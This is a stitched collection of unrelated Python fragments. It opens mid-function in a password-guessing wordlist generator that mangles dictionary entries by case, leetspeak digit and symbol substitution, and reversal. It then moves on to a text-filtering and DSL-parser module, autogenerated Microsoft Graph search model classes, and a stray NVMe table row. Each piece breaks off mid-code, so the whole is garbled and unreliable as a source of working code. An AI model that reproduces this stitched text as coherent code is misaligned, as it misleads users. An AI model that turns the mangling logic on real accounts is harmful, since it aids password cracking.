emailTimeStr += "Level 3: {} \n".format(levelThreeT - levelTwoT)
elif level == 5:
refFile = open(levelFourF, "r")
modFile = None
levelFourT = time.time()
print "Level 4: {} \n".format(levelFourT - levelThreeT)
emailTimeStr += "Level 4: {} \n".format(levelFourT - levelThreeT)
elif level == 6:
refFile = None
modFile = None
levelFiveT = time.time()
print "Level 5: {} \n".format(levelFiveT - levelFourT)
emailTimeStr += "Level 5: {} \n".format(levelFiveT - levelFourT)
if refFile is not None:
line = refFile.readline()
line = line.rstrip("\n")
# Use the level value to determine what type of modification to make to base dictVals
# Higher the level == more complicated/time-consuming attempts.
# In principle, quicker/easier passwords will be attempted first
# Set temp to current entry
temp = line
entryLen = len(temp)
entryPerms = []
# Pad shorter entries with a common "123..."
if entryLen < 6:
for j in range(1, 7 - entryLen):
temp += str(j)
if level == 1:
''' Level 1: (Letter Case) For each dictionary entry try:
- all lower case
- all upper case
- first letter capitalized
- every other letter capitalized (starting with the first one)
- every other letter capitalized (starting with the second one)
'''
modFile.write(temp.lower() + "\n")
entryPerms.append(temp.lower())
modFile.write(temp.upper() + "\n")
entryPerms.append(temp.upper())
modFile.write(temp.capitalize() + "\n")
entryPerms.append(temp.capitalize())
modFile.write(capEveryOther(temp, 0) + "\n")
entryPerms.append(capEveryOther(temp, 0))
modFile.write(capEveryOther(temp, 1) + "\n")
entryPerms.append(capEveryOther(temp, 1))
elif level == 2:
''' Level 2: (Number Substitution) For each value from level 1, try:
- 1 for l
- 3 for e
- 4 for a
- 5 for s
- 6 for b
- 7 for t
- 0 for o
- Combinations of each of the above
'''
modFile.write(temp + "\n")
entryPerms.append(temp)
# Count number of chars that can be substituted
charCount = 0
subsMade = 0
tmpSub = ""
for j in range(0, len(numSubChars)):
if numSubChars[j] in temp:
charCount += 1
for j in range(0, charCount):
subsMade = 0
tmpSub = temp
if "l" in temp or "L" in temp:
tmpSub = charSubst(tmpSub, "l", "1")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "e" in temp or "E" in temp:
tmpSub = charSubst(tmpSub, "e", "3")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "a" in temp or "A" in temp:
tmpSub = charSubst(tmpSub, "a", "4")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "s" in temp or "S" in temp:
tmpSub = charSubst(tmpSub, "s", "5")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "b" in temp or "B" in temp:
tmpSub = charSubst(tmpSub, "b", "6")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "t" in temp or "T" in temp:
tmpSub = charSubst(tmpSub, "t", "7")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "o" in temp or "O" in temp:
tmpSub = charSubst(tmpSub, "o", "0")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
elif level == 3:
''' Level 3: (Ordering Permutation) For each value from level 2, try:
- Reversing the entry
'''
modFile.write(temp + "\n")
entryPerms.append(temp)
modFile.write(temp[::-1] + "\n")
entryPerms.append(temp[::-1])
elif level == 4:
''' Level 4: (Symbol Substitution) For each value from level 3, try:
- ! for i
- @ for a
- ^ for v
- $ for s
- ( for c
- Combinations of each of the above
'''
modFile.write(temp + "\n")
entryPerms.append(temp)
#Count number of chars that can be substituted
charCount = 0
subsMade = 0
tmpSub = ""
for j in range(0, len(symSubChars)):
if symSubChars[j] in temp:
charCount += 1
for j in range(0, charCount):
subsMade = 0
tmpSub = temp
if "i" in temp or "I" in temp:
tmpSub = charSubst(tmpSub, "i", "!")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "a" in temp or "A" in temp:
tmpSub = charSubst(tmpSub, "a", "@")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
tmpSub = temp
if "v" in temp or "V" in temp:
tmpSub = charSubst(tmpSub, "v", "^")
subsMade += 1
if subsMade == j + 1:
modFile.write(tmpSub + "\n")
entryPerms.append(tmpSub)
subsMade = 0
| |
replacing tags
"""
# remove tags
untagged_text = str.join(
" ", list(ET.fromstring(xml_string).itertext()))
return untagged_text
    @staticmethod
    def remove_para_tags(text):
        """remove certain tags within paras lexically.
        Works on flat text
        Messy. At present tags are in TAGS and TAG_REGEXES
        """
        # Literal replacements first (TAGS maps tag string -> replacement)...
        for key in TAGS:
            text = text.replace(key, TAGS[key])
        # ...then regex replacements (TAG_REGEXES maps pattern -> replacement).
        for regex in TAG_REGEXES:
            text = re.sub(regex, TAG_REGEXES[regex], text)
        return text
@staticmethod
def flatten_non_ascii(text):
"""remove diacritics and other 'non-ascii' characters
Messy.
"""
text = text.encode("ascii", "ignore").decode("utf-8", "ignore")
return text
@staticmethod
def remove_non_alphanumeric(text, remove_digits=False):
"""
Remove nonalphanumeric characters
remove_digits: remove digits 0-9
"""
pattern = r'[^A-Za-z0-9\s]' if not remove_digits else r'[A-Za-z\s]'
text = re.sub(pattern, '', text)
return text
@staticmethod
def get_aggregate_words_from_files(files):
all_words = []
for file in files:
words = TextUtil.get_section_with_words(file).words
all_words.extend(words)
return all_words
@staticmethod # OBSOLETE
def filter_words(words) -> list:
words = [w for w in words if len(w) > 2]
words = [w for w in words if w.lower() not in STOPWORDS_EN]
words = [w for w in words if w.lower() not in STOPWORDS_PUB]
words = [w for w in words if not w.isnumeric()]
return words
@classmethod
def replace_chars(cls, text, unwanted_chars, replacement) -> str:
"""replaces all chars in unwanted chars with wanted_char
:param text: source text
:param unwanted_chars: string or list of unwanted characters
:param replacement: replacement character
:returns modified string
"""
text0 = ''.join(
[c if c not in unwanted_chars else replacement for c in text])
return text0
    @classmethod
    def split_into_sentences(cls, text, method="Spacy") -> list:
        """ splits a paragraph into sentences
        uses nltk sent_tokenize
        :param text: para to split
        :param method: currently unused; splitting always goes through nltk
        :returns: list of sentences (empty list for null or empty input)
        """
        sentences = []
        if text:
            sentences = nltk.sent_tokenize(text)
            # NOTE(review): logger.debug(">>", sent) passes an extra
            # positional arg; logging expects %-style placeholders — verify.
            for sent in sentences[:10]:
                cls.logger.debug(">>", sent)
        return sentences
@classmethod
def split_at_empty_newline(cls, text) -> list:
"""create a new section at each empty newlines
leading newline is ignored
trailing whitspace is trimmed
Example:
foo
bar
baz
boodle
will give:
['foo\nbar', 'baz', '', `boodle`]
trailing newlines are consumed.
final newline?[EOF] is consumed
"""
# trim leading newline
if text[0] == "\n":
text = text[1:]
lines = text.split('\n')
sects = []
sect = []
for line in lines:
line = line.rstrip()
if line == '':
sects.append(sect)
sect = []
else:
sect.append(line)
if len(sect) > 0:
sects.append(sect)
return sects
    @classmethod
    def test_split_at_empty_newline(cls):
        """Smoke test for split_at_empty_newline."""
        # NOTE(review): as visible here the literal contains no empty lines
        # and its lines keep source indentation, yet the expected value
        # below implies blank separators and unindented lines — confirm
        # against the original file before relying on this assertion.
        text = """
        foo
        bar
        baz
        boodle
        """
        lines = cls.split_at_empty_newline(text)
        assert(str(lines) == "[['foo', 'bar'], ['baz'], [], ['boodle']]")
class WordFilter:
    """Filters a list of words.

    Generally deletes words not satisfying a condition, but this may develop.
    """
    # These should really be read from path
    # false positives in organization dictionary.
    ORG_STOP = {
        "basis",
        "orange",
    }
    logger = logging.getLogger("word_filter")
    def __init__(self, stopword_sets=(STOPWORDS_EN, STOPWORDS_PUB),
                 min_length=2, delete_numeric=True, delete_non_alphanum=True):
        """
        :param stopword_sets: iterable of stopword collections to merge
        :param min_length: words of this length or shorter are dropped
        :param delete_numeric: drop purely numeric words
        :param delete_non_alphanum: drop words containing non-alphanumerics
        """
        self.min_length = min_length
        self.use_lower_stopwords = True
        # Bug fix: was initialised to {} (a dict, which has no .union()).
        self.stop_words_set = set()
        for swset in stopword_sets:
            self.stop_words_set = self.stop_words_set.union(swset)
        self.delete_numeric = delete_numeric
        # Bug fix: honour the parameter (was hard-coded True) and use a
        # name that does not shadow the delete_non_alphanum() method.
        self.delete_non_alphanumeric = delete_non_alphanum
        self.regex = None
        self.keep_regex = True
        self.split_spaces = False
    def show_params(self):
        """Log the current filter configuration (debug aid)."""
        # Bug fix: self.logger did not exist, and logging takes %-style
        # args, not arbitrary positional values.
        self.logger.info(
            "min length %s, use lower %s, stop words set %s, "
            "delete numeric %s, delete nonalpha %s, regex %s, "
            "keep regex %s, split spaces %s",
            self.min_length, self.use_lower_stopwords, self.stop_words_set,
            self.delete_numeric, self.delete_non_alphanumeric, self.regex,
            self.keep_regex, self.split_spaces,
        )
    def filter_words(self, words):
        """Apply the configured filters and return the surviving words."""
        words = self.delete_short_words(words, self.min_length)
        # Bug fix: called nonexistent self.delete_stop_words/self.stop_words.
        words = self.filter_stop_words(words, self.stop_words_set)
        if self.delete_numeric:
            words = self.delete_num(words)
        if self.delete_non_alphanumeric:
            words = self.delete_non_alphanum(words)
        if self.regex is not None:
            words = self.filter_by_regex(words, self.regex, self.keep_regex)
        return words
    def set_regex(self, regex_string, keep=True):
        """ filter words by regex
        regex_string: regex to match
        keep: if True accept matching words else reject matches
        """
        self.regex = re.compile(regex_string)
        self.keep_regex = keep
    @staticmethod
    def delete_num(words):
        """delete words satisfying str.isnumeric()"""
        # Bug fix: dropped the spurious `self` parameter (staticmethod).
        return [w for w in words if not w.isnumeric()]
    @staticmethod
    def delete_non_alphanum(words):
        """delete strings NOT satisfying str.isalnum()"""
        return [w for w in words if w.isalnum()]
    @staticmethod
    def delete_stop_words_list(words, stop_words_list):
        """delete words found in any of the given stop-word collections"""
        for stop_words in stop_words_list:
            words = [w for w in words if w.lower() not in stop_words]
        return words
    def filter_stop_words(self, words, stop_words, keep=False):
        """Keep (keep=True) or drop (default) words found in stop_words."""
        if keep:
            return [w for w in words if w.lower() in stop_words]
        return [w for w in words if w.lower() not in stop_words]
    def delete_short_words(self, words, min_length):
        """delete words whose length is <= min_length"""
        return [w for w in words if len(w) > min_length]
    def filter_by_regex(self, words, regex_string, keep=True):
        """Keep (keep=True) or drop (keep=False) words matching the regex."""
        # Bug fix: re.match was called without the word argument and the
        # keep flag was ignored.
        if keep:
            return [w for w in words if re.match(regex_string, w)]
        return [w for w in words if not re.match(regex_string, w)]
class DSLParser:
"""A DomainSpecificLangauge parser for pyami commands
currently accepts a simple nested lambda-like language similar to xpath
Later we'll move to something like pyparsing
https://pyparsing-docs.readthedocs.io/
"""
STR = "STR"
LIST = "LIST"
NUMB = "NUMB"
FILE = "FILE"
# assertions
FILE_EXISTS = "file_exists"
GLOB_COUNT = "glob_count"
ITEM = "item"
LEN = "len"
OPERATORS = {
"concat": [STR, STR],
"contains": [STR, STR],
"content": [FILE],
"count": [LIST],
"ends_with": [STR, STR],
"equals": [[STR, NUMB], [STR, NUMB]],
"exists": [FILE],
"greater_than": [[STR, NUMB], [STR, NUMB]],
"item": [LIST, NUMB],
"less_than": [[STR, NUMB], [STR, NUMB]],
"length": [STR],
"lower": [STR],
"normalize": [STR],
"reg_matches": [STR, STR],
"starts_with": [STR, STR],
"substring": [STR, NUMB, NUMB],
"upper": [STR],
}
logger = logging.getLogger("dsl_parser")
    def __init__(self):
        # tree/argstr are currently unused placeholders; parse_and_run
        # initialises the working state (arg_store, current_dict) instead.
        self.tree = {}
        self.argstr = None
    def parse_and_run(self, expr):
        """
        Parse a DSL expression and record the extracted arguments.

        :param expr: DSL expression string (e.g. "equals(len('x'),1)")
        """
        # arg_store accumulates one {"extracted": value} dict per argument.
        self.arg_store = []
        self.current_dict = None
        self.parse_args(expr)
        self.logger.info(f"parsed: {self.arg_store}")
        return
    def parse_args(self, argstr):
        """Repeatedly grab comma-separated arguments from argstr.

        Each extracted argument is dequoted and appended to self.arg_store
        (wrapped in a dict under the key "extracted"); nested expressions
        recurse via grab_next_arg.

        :param argstr: comma-separated argument text
        :raises ValueError: when arguments are not separated by a comma
        """
        self.logger.info(f"argstr: {argstr}")
        if not argstr:
            return None, None
        args = []
        while len(argstr) > 0:
            grabbed = self.grab_next_arg(argstr)
            if not grabbed:
                # grab_next_arg returns a bare None for unparsable input.
                self.logger.debug(f"DSL Null args")
                break
            # continue
            arg = grabbed[0]
            rest_argstr = grabbed[1]
            self.logger.info(f" EXTRACTED {arg} "
                             f" ... {rest_argstr}")
            if arg is not None:
                arg = self.dequote(arg)
                self.current_dict = {}
                self.current_dict["extracted"] = arg
                self.arg_store.append(self.current_dict)
                args.append(arg)
            if not rest_argstr or len(rest_argstr) == 0:
                break
            if rest_argstr[0] != ',':
                raise ValueError(f"expected leading comma in {rest_argstr}")
            argstr = rest_argstr[1:]
        self.logger.info(f"{len(args)} ARGS: {args}")
def dequote(self, arg):
"""remove balanced qoutes from start and end of string
len(arg) must be > 1
:param arg:string to dequote
:returns: dequoted string or original if not possible
"""
if isinstance(arg, str):
# start/end are same character
if len(arg) > 1 and (arg[0] == arg[-1]):
if arg[0] == "'" or arg[0] == '"':
arg = arg[1:-1]
return arg
    def grab_next_arg(self, argstr):
        """Extract the next argument from argstr.

        Dispatches on the first character: quote -> string token,
        digit/sign/dot -> number, anything else -> operator expression
        (whose own arguments are parsed recursively).

        :returns: (arg, rest) tuple, or a bare None when an expression
            yielded no recognisable function call.
        """
        # next() can be NUMB, FILE, EXPR, STR, LIST
        ch = argstr[0]
        arg = None
        if ch == '\"' or ch == "\'": # string or possibly list
            arg, rest_args = self.grab_string(argstr)
            self.logger.debug(len(arg))
            arg = self.dequote(arg)
            self.logger.debug(
                f"argstr [{argstr}] grabbed quoted string arg: [{arg} ({len(arg)})] + rest_args [{rest_args}]")
        elif ch in ".-+0123456789": # number
            arg, rest_args = self.grab_number(argstr)
            self.logger.debug(f"grabbed number {type(arg)} {arg}")
        else: # expressiom
            arg, rest_args = self.grab_expr(argstr)
            self.logger.debug(f"arg: [{arg}] === rest_args: [{rest_args}]")
            funct_arg = self.get_function_and_args(arg)
            if not funct_arg:
                return None
            funct = funct_arg[0]
            funct_args = funct_arg[1]
            self.logger.debug(f" FUNCT: [{funct}] \n"
                              f" ... ARGS [{funct_args}]")
            self.parse_args(funct_args)
            # The nested arguments were recorded by parse_args; the
            # expression itself is deliberately not returned as an arg.
            arg = None
        self.logger.debug(f"grabbed ||{arg}||{rest_args}||")
        return arg, rest_args
    def get_function_and_args(self, argstr):
        """Split "funct(args...)" into (funct, args) — trailing ")" dropped.

        :param argstr: expression text; None/empty yields None
        :raises ValueError: (from str.index) when argstr contains no "("
        """
        if not argstr:
            return None
        idx = argstr.index("(")
        funct = argstr[:idx]
        funct_args = argstr[idx+1:-1]
        return funct, funct_args
def grab_number(self, argstr): # ends with comma or EOS
idx = argstr.find(",", 1)
if idx == -1:
idx = len(argstr)
arg = self.create_int_or_float(argstr[:idx])
argstr = argstr[idx:]
return arg, argstr
def create_int_or_float(self, arg):
if isinstance(arg, int):
arg = int(arg)
elif isinstance(arg, float):
arg = float(arg)
return arg
def grab_string(self, argstr):
quote = argstr[0]
idx = argstr.find(quote, 1)
if idx == -1:
raise Exception(f"cannot parse as quoted string: {argstr}")
arg = argstr[:idx+1]
argstr = argstr[idx+1:]
self.logger.debug(f"str {argstr}")
return arg, argstr,
    def grab_expr(self, argstr):
        """Take a leading "<operator>(...)" expression.

        :returns: (expression, rest), or (None, None) when argstr does not
            start with a known operator name.
        """
        for key in self.OPERATORS:
            if argstr.startswith(key + "("):
                # idx = len(key)+1
                idx = self.get_balanced_bracket(argstr)
                arg = argstr[:idx + 1]
                rest = argstr[idx + 1:]
                self.logger.debug(f"{arg} -- {rest}")
                return arg, rest
        return None, None
def get_balanced_bracket(self, param):
level = 0
found_brackets = False
for i, c in enumerate(param):
if c == '(':
level += 1
found_brackets = True
elif c == ')':
level -= 1
if level < 0:
raise Exception(f"unexpected ) in {param}")
if level == 0:
return i
return -1
# ============================================
def assert_file_exists(self, file):
"""
:param file:
"""
if not os.path.exists(file):
self.assert_error(f"path {file} does not exist")
else:
self.logger.info(f"File exists: {file}")
pass
def assert_glob_count(self, glob_, count):
| |
self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.acl = kwargs.get('acl', None)
self.content = kwargs.get('content', None)
self.properties = kwargs.get('properties', None)
class MicrosoftGraphExternalItemContent(msrest.serialization.Model):
    """externalItemContent.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param type: Possible values include: "text", "html", "unknownFutureValue".
    :type type: str or ~search.models.MicrosoftGraphExternalItemContentType
    :param value:
    :type value: str
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'type': {'key': 'type', 'type': 'str'},
        'value': {'key': 'value', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(MicrosoftGraphExternalItemContent, self).__init__(**kwargs)
        # Each declared field defaults to None when absent from kwargs.
        for name in ('additional_properties', 'type', 'value'):
            setattr(self, name, kwargs.get(name))
class MicrosoftGraphInnerErrorDetail(msrest.serialization.Model):
    """innerErrorDetail.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param message:
    :type message: str
    :param source:
    :type source: str
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'message': {'key': 'message', 'type': 'str'},
        'source': {'key': 'source', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(MicrosoftGraphInnerErrorDetail, self).__init__(**kwargs)
        # Each declared field defaults to None when absent from kwargs.
        for name in ('additional_properties', 'message', 'source'):
            setattr(self, name, kwargs.get(name))
class MicrosoftGraphProperty(msrest.serialization.Model):
    """property.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param aliases:
    :type aliases: list[str]
    :param is_content:
    :type is_content: bool
    :param is_queryable:
    :type is_queryable: bool
    :param is_refinable:
    :type is_refinable: bool
    :param is_retrievable:
    :type is_retrievable: bool
    :param is_searchable:
    :type is_searchable: bool
    :param labels:
    :type labels: list[str or ~search.models.MicrosoftGraphLabel]
    :param name:
    :type name: str
    :param type: Possible values include: "String", "Int64", "Double", "DateTime", "Boolean",
     "StringCollection", "Int64Collection", "DoubleCollection", "DateTimeCollection".
    :type type: str or ~search.models.MicrosoftGraphPropertyType
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'aliases': {'key': 'aliases', 'type': '[str]'},
        'is_content': {'key': 'isContent', 'type': 'bool'},
        'is_queryable': {'key': 'isQueryable', 'type': 'bool'},
        'is_refinable': {'key': 'isRefinable', 'type': 'bool'},
        'is_retrievable': {'key': 'isRetrievable', 'type': 'bool'},
        'is_searchable': {'key': 'isSearchable', 'type': 'bool'},
        'labels': {'key': 'labels', 'type': '[str]'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(MicrosoftGraphProperty, self).__init__(**kwargs)
        # Each declared field defaults to None when absent from kwargs.
        for name in (
            'additional_properties', 'aliases', 'is_content', 'is_queryable',
            'is_refinable', 'is_retrievable', 'is_searchable', 'labels',
            'name', 'type',
        ):
            setattr(self, name, kwargs.get(name))
class MicrosoftGraphSchema(MicrosoftGraphEntity):
    """schema.

    :param id: Read-only.
    :type id: str
    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param base_type:
    :type base_type: str
    :param properties:
    :type properties: list[~search.models.MicrosoftGraphProperty]
    """

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'additional_properties': {'key': '', 'type': '{object}'},
        'base_type': {'key': 'baseType', 'type': 'str'},
        'properties': {'key': 'properties', 'type': '[MicrosoftGraphProperty]'},
    }

    def __init__(self, **kwargs):
        # 'id' is populated by the MicrosoftGraphEntity base initializer.
        super(MicrosoftGraphSchema, self).__init__(**kwargs)
        for name in ('additional_properties', 'base_type', 'properties'):
            setattr(self, name, kwargs.get(name))
class MicrosoftGraphSearchAggregation(msrest.serialization.Model):
    """searchAggregation.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param buckets:
    :type buckets: list[~search.models.MicrosoftGraphSearchBucket]
    :param field:
    :type field: str
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'buckets': {'key': 'buckets', 'type': '[MicrosoftGraphSearchBucket]'},
        'field': {'key': 'field', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(MicrosoftGraphSearchAggregation, self).__init__(**kwargs)
        # Each declared field defaults to None when absent from kwargs.
        for name in ('additional_properties', 'buckets', 'field'):
            setattr(self, name, kwargs.get(name))
class MicrosoftGraphSearchBucket(msrest.serialization.Model):
    """searchBucket.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param aggregation_filter_token:
    :type aggregation_filter_token: str
    :param count:
    :type count: int
    :param key:
    :type key: str
    """

    # 'count' is constrained to the signed 32-bit integer range.
    _validation = {
        'count': {'maximum': 2147483647, 'minimum': -2147483648},
    }

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'aggregation_filter_token': {'key': 'aggregationFilterToken', 'type': 'str'},
        'count': {'key': 'count', 'type': 'int'},
        'key': {'key': 'key', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(MicrosoftGraphSearchBucket, self).__init__(**kwargs)
        for name in ('additional_properties', 'aggregation_filter_token',
                     'count', 'key'):
            setattr(self, name, kwargs.get(name))
class MicrosoftGraphSearchEntity(MicrosoftGraphEntity):
    """searchEntity.

    :param id: Read-only.
    :type id: str
    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    """

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'additional_properties': {'key': '', 'type': '{object}'},
    }

    def __init__(self, **kwargs):
        # 'id' is populated by the MicrosoftGraphEntity base initializer.
        super(MicrosoftGraphSearchEntity, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties')
class MicrosoftGraphSearchHit(msrest.serialization.Model):
    """searchHit.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param id:
    :type id: str
    :param score:
    :type score: int
    :param content_source:
    :type content_source: str
    :param hit_id:
    :type hit_id: str
    :param rank:
    :type rank: int
    :param summary:
    :type summary: str
    :param source: entity.
    :type source: ~search.models.MicrosoftGraphEntity
    :param resource: entity.
    :type resource: ~search.models.MicrosoftGraphEntity
    """

    _validation = {
        'score': {'maximum': 2147483647, 'minimum': -2147483648},
        'rank': {'maximum': 2147483647, 'minimum': -2147483648},
    }

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'id': {'key': '_id', 'type': 'str'},
        'score': {'key': '_score', 'type': 'int'},
        'content_source': {'key': 'contentSource', 'type': 'str'},
        'hit_id': {'key': 'hitId', 'type': 'str'},
        'rank': {'key': 'rank', 'type': 'int'},
        # NOTE: the generator emitted both a '_summary' and a 'summary'
        # mapping under the same 'summary' dict key; the later duplicate key
        # won, so only the 'summary' mapping was ever effective. The dead
        # '_summary' entry has been removed to make that explicit.
        'summary': {'key': 'summary', 'type': 'str'},
        'source': {'key': '_source', 'type': 'MicrosoftGraphEntity'},
        'resource': {'key': 'resource', 'type': 'MicrosoftGraphEntity'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(MicrosoftGraphSearchHit, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties', None)
        self.id = kwargs.get('id', None)
        self.score = kwargs.get('score', None)
        self.summary = kwargs.get('summary', None)
        self.content_source = kwargs.get('content_source', None)
        self.hit_id = kwargs.get('hit_id', None)
        self.rank = kwargs.get('rank', None)
        self.source = kwargs.get('source', None)
        self.resource = kwargs.get('resource', None)
class MicrosoftGraphSearchHitsContainer(msrest.serialization.Model):
    """searchHitsContainer.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param aggregations:
    :type aggregations: list[~search.models.MicrosoftGraphSearchAggregation]
    :param hits:
    :type hits: list[~search.models.MicrosoftGraphSearchHit]
    :param more_results_available:
    :type more_results_available: bool
    :param total:
    :type total: int
    """

    # 'total' is constrained to the signed 32-bit integer range.
    _validation = {
        'total': {'maximum': 2147483647, 'minimum': -2147483648},
    }

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'aggregations': {'key': 'aggregations', 'type': '[MicrosoftGraphSearchAggregation]'},
        'hits': {'key': 'hits', 'type': '[MicrosoftGraphSearchHit]'},
        'more_results_available': {'key': 'moreResultsAvailable', 'type': 'bool'},
        'total': {'key': 'total', 'type': 'int'},
    }

    def __init__(self, **kwargs):
        super(MicrosoftGraphSearchHitsContainer, self).__init__(**kwargs)
        for name in ('additional_properties', 'aggregations', 'hits',
                     'more_results_available', 'total'):
            setattr(self, name, kwargs.get(name))
class MicrosoftGraphSearchQuery(msrest.serialization.Model):
    """searchQuery.

    :param additional_properties: Unmatched properties from the message are deserialized to this
     collection.
    :type additional_properties: dict[str, object]
    :param query_string:
    :type query_string: str
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        # NOTE: the generator also emitted a 'query_string' ->
        # MicrosoftGraphSearchQueryString mapping under this same dict key;
        # the later duplicate key won, so only the plain-string mapping was
        # ever effective. The dead duplicate entry (and the matching
        # duplicate docstring param and attribute assignment) were removed.
        'query_string': {'key': 'queryString', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(MicrosoftGraphSearchQuery, self).__init__(**kwargs)
        self.additional_properties = kwargs.get('additional_properties', None)
        self.query_string = kwargs.get('query_string', None)
class MicrosoftGraphSearchQueryString(msrest.serialization.Model):
    """searchQueryString.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param query:
    :type query: str
    """

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'query': {'key': 'query', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(MicrosoftGraphSearchQueryString, self).__init__(**kwargs)
        # Each declared field defaults to None when absent from kwargs.
        for name in ('additional_properties', 'query'):
            setattr(self, name, kwargs.get(name))
class MicrosoftGraphSearchRequest(msrest.serialization.Model):
    """searchRequest.

    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection.
    :type additional_properties: dict[str, object]
    :param aggregation_filters:
    :type aggregation_filters: list[str]
    :param aggregations:
    :type aggregations: list[~search.models.MicrosoftGraphAggregationOption]
    :param content_sources:
    :type content_sources: list[str]
    :param enable_top_results:
    :type enable_top_results: bool
    :param entity_types:
    :type entity_types: list[str or ~search.models.MicrosoftGraphEntityType]
    :param fields:
    :type fields: list[str]
    :param from_property:
    :type from_property: int
    :param query: searchQuery.
    :type query: ~search.models.MicrosoftGraphSearchQuery
    :param size:
    :type size: int
    :param sort_properties:
    :type sort_properties: list[~search.models.MicrosoftGraphSortProperty]
    :param stored_fields:
    :type stored_fields: list[str]
    """

    # Paging values are constrained to the signed 32-bit integer range.
    _validation = {
        'from_property': {'maximum': 2147483647, 'minimum': -2147483648},
        'size': {'maximum': 2147483647, 'minimum': -2147483648},
    }

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'aggregation_filters': {'key': 'aggregationFilters', 'type': '[str]'},
        'aggregations': {'key': 'aggregations', 'type': '[MicrosoftGraphAggregationOption]'},
        'content_sources': {'key': 'contentSources', 'type': '[str]'},
        'enable_top_results': {'key': 'enableTopResults', 'type': 'bool'},
        'entity_types': {'key': 'entityTypes', 'type': '[str]'},
        'fields': {'key': 'fields', 'type': '[str]'},
        'from_property': {'key': 'from', 'type': 'int'},
        'query': {'key': 'query', 'type': 'MicrosoftGraphSearchQuery'},
        'size': {'key': 'size', 'type': 'int'},
        'sort_properties': {'key': 'sortProperties', 'type': '[MicrosoftGraphSortProperty]'},
        # NOTE(review): wire key 'stored_fields' is snake_case unlike every
        # other camelCase key here — presumably matches the service schema;
        # confirm before changing.
        'stored_fields': {'key': 'stored_fields', 'type': '[str]'},
    }

    def __init__(self, **kwargs):
        super(MicrosoftGraphSearchRequest, self).__init__(**kwargs)
        # Each declared field defaults to None when absent from kwargs.
        for name in (
            'additional_properties', 'aggregation_filters', 'aggregations',
            'content_sources', 'enable_top_results', 'entity_types', 'fields',
            'from_property', 'query', 'size', 'sort_properties',
            'stored_fields',
        ):
            setattr(self, name, kwargs.get(name))
class MicrosoftGraphSearchResponse(msrest.serialization.Model):
"""searchResponse.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param hits_containers:
:type hits_containers: list[~search.models.MicrosoftGraphSearchHitsContainer]
:param search_terms:
:type search_terms: list[str]
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'hits_containers': {'key': | |
['mCmpCtrlStatus', 'nvmeMiCtrlHealthChngFlags_t', 'NVME_MI_CTRL_HEALTH_CHNG_FLAGS_VERSION_MAJOR', 'NVME_MI_CTRL_HEALTH_CHNG_FLAGS_VERSION_MINOR', 4, None, None, None, None],
